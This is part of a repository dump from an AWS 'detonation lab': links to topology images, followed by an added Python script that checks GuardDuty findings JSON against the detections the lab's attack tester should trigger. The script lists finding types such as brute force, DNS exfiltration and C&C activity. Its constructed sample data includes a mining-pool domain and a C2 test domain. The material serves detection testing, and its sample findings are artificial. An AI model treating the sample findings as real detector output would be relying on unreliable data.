--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-Inspector.png
--------------------------------------------------------------------------------
/images/Topology/Topology-cloudTrail.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-cloudTrail.png
--------------------------------------------------------------------------------
/images/Topology/Topology-guardduty.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-guardduty.png
--------------------------------------------------------------------------------
/images/Topology/Topology-macie.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-macie.png
--------------------------------------------------------------------------------
/images/Topology/Topology-vpcflow.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-vpcflow.png
--------------------------------------------------------------------------------
/images/Topology/Topology-wazuh.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/Topology/Topology-wazuh.png
--------------------------------------------------------------------------------
/images/detonationLab-created.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/detonationLab-created.png
--------------------------------------------------------------------------------
/images/guardDutyFindings-example.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sonofagl1tch/AWSDetonationLab/f96bbf08cc59e665d66db5af9d404d1a40054859/images/guardDutyFindings-example.png
--------------------------------------------------------------------------------
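attacks/guardduty_tester.sh ends by printing the findings each test is expected to produce, but leaves checking them to the reader. The script below is an added example, not part of the AWSDetonationLab repository: it takes the JSON that `aws guardduty get-findings` returns and reports which of the tester's expected (finding type, instance, connection direction) combinations are present and which are missing. The instance IDs and the sample findings are constructed placeholders standing in for the values localIps.sh would hold and for real detector output; the field names used (`Type`, `Resource.InstanceDetails.InstanceId`, `Service.Action.ActionType`, `NetworkConnectionAction.ConnectionDirection`) follow the GuardDuty finding schema.

```python
"""Check GuardDuty findings against the list guardduty_tester.sh prints under
"Expected GuardDuty Findings". Added example, not code from the AWSDetonationLab
repository. Input is the JSON returned by `aws guardduty get-findings`
({"Findings": [...]}); instance IDs below are placeholders for localIps.sh values."""
import json
import sys

# Instance roles the tester refers to; the IDs are made-up placeholders.
INSTANCES = {
    "red_team": "i-0aaaaaaaaaaaaaaa1",        # $RED_TEAM_INSTANCE
    "linux_target": "i-0bbbbbbbbbbbbbbb2",    # $BASIC_LINUX_INSTANCE
    "windows_target": "i-0ccccccccccccccc3",  # $BASIC_WINDOWS_INSTANCE
}

# (test, finding type, instance role, connection direction), as the tester's trailer lists them.
# Direction is None for DNS-based findings, which carry a DnsRequestAction instead.
EXPECTED = [
    ("Test 1", "Recon:EC2/Portscan", "red_team", "OUTBOUND"),
    ("Test 2", "UnauthorizedAccess:EC2/SSHBruteForce", "red_team", "OUTBOUND"),
    ("Test 2", "UnauthorizedAccess:EC2/SSHBruteForce", "linux_target", "INBOUND"),
    ("Test 3", "UnauthorizedAccess:EC2/RDPBruteForce", "red_team", "OUTBOUND"),
    ("Test 3", "UnauthorizedAccess:EC2/RDPBruteForce", "windows_target", "INBOUND"),
    ("Test 4", "CryptoCurrency:EC2/BitcoinTool.B!DNS", "red_team", None),
    ("Test 5", "Backdoor:EC2/DNSDataExfiltration", "red_team", None),
    ("Test 6", "Backdoor:EC2/C&CActivity.B!DNS", "red_team", None),
]


def finding_key(finding):
    """Reduce one finding to (type, instance id, direction); direction only exists for NETWORK_CONNECTION."""
    ftype = finding.get("Type")
    instance_id = finding.get("Resource", {}).get("InstanceDetails", {}).get("InstanceId")
    action = finding.get("Service", {}).get("Action", {})
    direction = None
    if action.get("ActionType") == "NETWORK_CONNECTION":
        direction = action.get("NetworkConnectionAction", {}).get("ConnectionDirection")
    return ftype, instance_id, direction


def check_findings(findings, instances=INSTANCES, expected=EXPECTED):
    """Return (covered, missing): the expected tuples that do / do not have a matching finding."""
    seen = {finding_key(f) for f in findings}
    covered, missing = [], []
    for item in expected:
        _test, ftype, role, direction = item
        (covered if (ftype, instances[role], direction) in seen else missing).append(item)
    return covered, missing


def _net(ftype, instance_id, direction, remote_ip):
    """Constructed NETWORK_CONNECTION finding in get-findings shape (sample data, not real output)."""
    return {"Type": ftype,
            "Resource": {"ResourceType": "Instance", "InstanceDetails": {"InstanceId": instance_id}},
            "Service": {"Action": {"ActionType": "NETWORK_CONNECTION",
                                   "NetworkConnectionAction": {"ConnectionDirection": direction,
                                                               "RemoteIpDetails": {"IpAddressV4": remote_ip}}}}}


def _dns(ftype, instance_id, domain):
    """Constructed DNS_REQUEST finding in get-findings shape (sample data, not real output)."""
    return {"Type": ftype,
            "Resource": {"ResourceType": "Instance", "InstanceDetails": {"InstanceId": instance_id}},
            "Service": {"Action": {"ActionType": "DNS_REQUEST", "DnsRequestAction": {"Domain": domain}}}}


# Constructed sample: everything the tester expects except the inbound RDP finding on the
# Windows target, plus one unrelated port-probe finding on an instance outside the lab.
SAMPLE_FINDINGS = [
    _net("Recon:EC2/Portscan", INSTANCES["red_team"], "OUTBOUND", "172.16.0.31"),
    _net("UnauthorizedAccess:EC2/SSHBruteForce", INSTANCES["red_team"], "OUTBOUND", "172.16.0.31"),
    _net("UnauthorizedAccess:EC2/SSHBruteForce", INSTANCES["linux_target"], "INBOUND", "172.16.0.41"),
    _net("UnauthorizedAccess:EC2/RDPBruteForce", INSTANCES["red_team"], "OUTBOUND", "172.16.0.32"),
    _dns("CryptoCurrency:EC2/BitcoinTool.B!DNS", INSTANCES["red_team"], "xdn-xmr.pool.minergate.com"),
    _dns("Backdoor:EC2/DNSDataExfiltration", INSTANCES["red_team"], "example.com"),
    _dns("Backdoor:EC2/C&CActivity.B!DNS", INSTANCES["red_team"], "GuardDutyC2ActivityB.com"),
    {"Type": "Recon:EC2/PortProbeUnprotectedPort",
     "Resource": {"ResourceType": "Instance", "InstanceDetails": {"InstanceId": "i-0ddddddddddddddd4"}},
     "Service": {"Action": {"ActionType": "PORT_PROBE", "PortProbeAction": {"Blocked": False}}}},
]


def check_sample():
    """Run the check over the constructed sample (used by main() when no file is given)."""
    return check_findings(SAMPLE_FINDINGS)


def main(argv):
    # With a path, read saved `aws guardduty get-findings` output; otherwise use the sample.
    if len(argv) > 1:
        with open(argv[1]) as fh:
            covered, missing = check_findings(json.load(fh)["Findings"])
    else:
        covered, missing = check_sample()
    for test, ftype, role, direction in covered:
        print(f"OK       {test}: {ftype} on {role} ({direction or 'DNS'})")
    for test, ftype, role, direction in missing:
        print(f"MISSING  {test}: {ftype} on {role} ({direction or 'DNS'})")
    return 1 if missing else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run with no arguments to see the sample report (one MISSING line for the inbound RDP finding), or save the output of `aws guardduty get-findings --detector-id <id> --finding-ids <ids>` to a file and pass its path; the exit status is non-zero while anything the tester expects is still missing, which makes it usable as a post-detonation gate.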